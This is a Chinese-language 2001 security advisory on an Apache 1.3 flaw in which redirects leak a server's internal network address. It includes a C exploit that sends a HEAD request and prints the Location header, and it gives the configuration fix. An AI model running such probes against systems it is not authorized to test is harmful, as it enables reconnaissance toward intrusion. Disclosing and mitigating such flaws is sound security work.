Apache Server地址存在泄露问题发布时间:2001-08-15 更新时间:2001-08-15 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Apache Group Apache 1.3详细描述 Apache WEB服务器存在一个落动可以导致服务器地址的泄露。当带有URI目录 的HTTP请求发送给服务器的时候,问题就会产生,如果URI不包含'/'字符, 服务器为了完成请求就会返回3xx重定向错误代码来指示进一步的行为,而 'Location'响应头中会包含服务器的地址来作为响应的一部分。这样服务器 如果在防火墙背后就可能导致泄露服务器的内部网络地址。 测试代码 /* Exploit for the Apache Server Address Disclosure Vulnerability ** ** by: magnum ** magnum@fuckthat.org ** http://fuckthat.org ** ** [explanation taken from from http://securityfocus.com/vdb/?id=3169] ** ** A vulnerability has been discovered in Apache web server that may ** result in the disclosure of the server's address. ** ** The problem occurs when a HTTP request containing the URI of a directory ** is submitted to the server. If the URI does not contain a trailing '/' ** character, the server returns a 3xx redirection error code indicating that ** further action must be taken in order to fulfill the request. When this ** occurs, a 'Location' response-header containing the address of the server ** is returned as part of the response. ** ** In a situation where the request is redirected to the server behind a ** firewall, this could lead to the disclosure of the server's internal ** network address. ** ** --SNIP-- ** ** As it was put so well in that explanation, an attacker could exploit this ** vulnerability to gain important information that could help you or an ** attacker to eventually compromise a network or server that resides behind ** an ipchains/NAT firewall, routing firewall, or many other different kinds ** of bastion hosts. ** ** Enjoy :) ** */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <unistd.h> #include <string.h> #include <arpa/inet.h> #include <sys/time.h> #define ERROR -1 #define MAXLEN 400 main(int argc, char *argv[]) { int sock_fd; struct sockaddr_in dest_addr; struct hostent *he; char buf[1024]; char request[1024]; char *p; int i; int jackmove; if (argc != 4) { printf("Usage: %s <hostname> <port> <directory>\n",argv[0]); printf("Example(verbose): %s www.linux.org 80 /info\n",argv[0]); printf("Example(specify): %s www.linux.org 80 /info | grep Location\n",argv[0]); printf("Example(output) : Location: http://127.0.0.3/supersecretshit/\n"); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */ printf("Unknown host.\n"); exit(1); } dest_addr.sin_family = AF_INET; i = atoi(argv[2]); dest_addr.sin_port = htons(i); dest_addr.sin_addr = *((struct in_addr *)he->h_addr); bzero(&(dest_addr.sin_zero), 8); /* heh, sorry, no error checking */ if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Cannot open socket.\n"); exit(1); } if(connect(sock_fd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) == -1) { printf("Could not connect to socket.\n"); exit(1); } printf("Disclose - Exploit for the Apache Server Address Disclosure Vulnerability\n"); printf("by: magnum - magnum@fuckthat.org - http://www.fuckthat.org\n\n"); strcat(request,"HEAD "); strcat(request,argv[3]); strcat(request," HTTP/1.0\n\n\n"); sleep(1); send(sock_fd, request, strlen(request), 0); printf("Status: "); if((jackmove=recv(sock_fd, buf, MAXLEN, 0)) == ERROR) { printf("recv error\n"); close(sock_fd); exit(1); } printf("Done.\n"); buf[jackmove] = '\0'; p=strstr(buf, "Location"); printf("%s\n", p); close(sock_fd); exit(0); } 解决方案 关闭'UseCanonicalName' 特征和通过ServerName来指定适当的服务器名字。 相关信息 magnum@fuckthat.org http://fuckthat.org |
